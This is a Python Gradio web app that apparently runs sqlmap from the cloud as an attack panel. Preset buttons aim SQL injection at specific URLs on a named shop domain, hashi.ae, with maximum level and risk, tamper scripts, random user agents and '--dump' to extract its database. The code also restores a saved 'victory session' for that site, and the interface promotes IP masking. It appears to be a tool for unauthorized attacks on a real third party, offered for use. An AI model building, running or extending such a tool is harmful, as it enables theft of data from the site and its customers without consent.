| import gradio as gr |
| import subprocess |
| import os |
| import shutil |
| from pathlib import Path |
|
|
| |
| def restore_session(): |
| |
| session_source = "session.sqlite" |
| target_base = Path("/root/.local/share/sqlmap/output/hashi.ae") |
| |
| if os.path.exists(session_source): |
| try: |
| target_base.mkdir(parents=True, exist_ok=True) |
| shutil.copy(session_source, target_base / "session.sqlite") |
| |
| |
| target_www = Path("/root/.local/share/sqlmap/output/www.hashi.ae") |
| target_www.mkdir(parents=True, exist_ok=True) |
| shutil.copy(session_source, target_www / "session.sqlite") |
| |
| return f"β
Victory Session Injected into {target_base}" |
| except Exception as e: |
| return f"β οΈ Session restore warning: {str(e)}" |
| return "βΉοΈ No session file found in repository." |
|
|
| def run_sqlmap(url, threads, level, risk, tamper, techn, proxy, extra_args): |
| |
| session_status = restore_session() |
|
|
| if not url: |
| yield f"{session_status}\nβ Error: Target URL is required." |
| return |
|
|
| |
| cmd = ["python3", "/app/sqlmap-dev/sqlmap.py", "-u", url, "--batch"] |
| |
| |
| cmd += ["--threads", str(int(threads))] |
| cmd += ["--level", str(int(level))] |
| cmd += ["--risk", str(int(risk))] |
| |
| |
| if tamper: |
| cmd += ["--tamper", tamper] |
| if techn: |
| cmd += ["--technique", techn] |
| if proxy: |
| cmd += ["--proxy", proxy] |
| if extra_args: |
| cmd += extra_args.split() |
|
|
| yield f"{session_status}\nπ Launching SQLMAP Cloud Runner...\nπ°οΈ Command: {' '.join(cmd)}\n\n" |
| |
| try: |
| process = subprocess.Popen( |
| cmd, |
| stdout=subprocess.PIPE, |
| stderr=subprocess.STDOUT, |
| text=True, |
| bufsize=1, |
| universal_newlines=True |
| ) |
| |
| full_log = "" |
| for line in process.stdout: |
| full_log += line |
| yield full_log |
| |
| process.wait() |
| if process.returncode == 0: |
| yield full_log + "\nβ
Scan completed successfully." |
| else: |
| yield full_log + f"\nβ οΈ Scan stopped with return code {process.returncode}." |
| |
| except Exception as e: |
| yield f"β Fatal Error: {str(e)}" |
|
|
| |
| def set_hashi_victory(): |
| return ( |
| "https://hashi.ae/shop/page/4/?add-to-cart=638", |
| 10, 5, 3, |
| "", "U", "", |
| "--dbms=Oracle --dump --force-ssl --unstable --random-agent --no-cast" |
| ) |
|
|
| def set_search_attack(): |
| return ( |
| "https://hashi.ae/?s=iphone", |
| 10, 5, 3, |
| "space2comment", "BEU", "", |
| "--dbms=Oracle --dump --force-ssl --unstable --random-agent --no-cast" |
| ) |
|
|
| def set_mysql_attack(): |
| return ( |
| "https://hashi.ae/?s=iphone", |
| 10, 5, 3, |
| "space2comment", "BEU", "", |
| "--dbms=MySQL --dump --force-ssl --random-agent --no-cast" |
| ) |
|
|
| with gr.Blocks(theme=gr.themes.Soft(primary_hue="blue", secondary_hue="slate")) as demo: |
| gr.Markdown("# π SLMP Cloud Runner - Ultra Speed π©οΈ") |
| gr.Markdown("Deploy SQLMAP in the cloud for maximum bandwidth and IP masking. Designed for the Alpha Wolf.") |
| |
| with gr.Row(): |
| with gr.Column(scale=2): |
| url_input = gr.Textbox(label="π― Target URL", placeholder="https://example.com/page.php?id=1") |
| |
| with gr.Tabs(): |
| with gr.TabItem("π Performance"): |
| with gr.Row(): |
| threads_input = gr.Slider(minimum=1, maximum=10, step=1, value=10, label="Threads") |
| level_input = gr.Slider(minimum=1, maximum=5, step=1, value=5, label="Level") |
| risk_input = gr.Slider(minimum=1, maximum=3, step=1, value=3, label="Risk") |
| |
| with gr.TabItem("π‘οΈ Advanced"): |
| tamper_input = gr.Textbox(label="π§ͺ Tampers", placeholder="space2comment,randomcase") |
| techn_input = gr.Textbox(label="π‘ Technique", placeholder="U (UNION), B (Blind), etc.") |
| proxy_input = gr.Textbox(label="π Proxy (Optional)", placeholder="http://127.0.0.1:8080") |
| extra_input = gr.Textbox(label="βοΈ Extra Arguments", placeholder="--dbms=Oracle --dump --batch") |
|
|
| with gr.Row(): |
| btn_run = gr.Button("π₯ START SCAN", variant="primary") |
| with gr.Row(): |
| btn_hashi = gr.Button("π° Hashi Victory (Anti-Ban)", variant="secondary") |
| btn_search = gr.Button("π Search (Oracle - Plan C)", variant="stop") |
| btn_mysql = gr.Button("π¬ Search (MySQL - Plan D)", variant="secondary") |
| btn_stop = gr.Button("π STOP", variant="stop") |
|
|
| with gr.Column(scale=3): |
| output_log = gr.Code(label="π LIVE CLOUD LOGS", language="markdown", interactive=False, lines=30) |
|
|
| |
| btn_run.click( |
| fn=run_sqlmap, |
| inputs=[url_input, threads_input, level_input, risk_input, tamper_input, techn_input, proxy_input, extra_input], |
| outputs=output_log, |
| queue=True |
| ) |
| |
| btn_hashi.click( |
| fn=set_hashi_victory, |
| outputs=[url_input, threads_input, level_input, risk_input, tamper_input, techn_input, proxy_input, extra_input] |
| ) |
|
|
| btn_search.click( |
| fn=set_search_attack, |
| outputs=[url_input, threads_input, level_input, risk_input, tamper_input, techn_input, proxy_input, extra_input] |
| ) |
|
|
| btn_mysql.click( |
| fn=set_mysql_attack, |
| outputs=[url_input, threads_input, level_input, risk_input, tamper_input, techn_input, proxy_input, extra_input] |
| ) |
|
|
| if __name__ == "__main__": |
| print("β¨ SLMP Panel Live.") |
| demo.queue().launch(server_name="0.0.0.0", server_port=7860) |
|
|
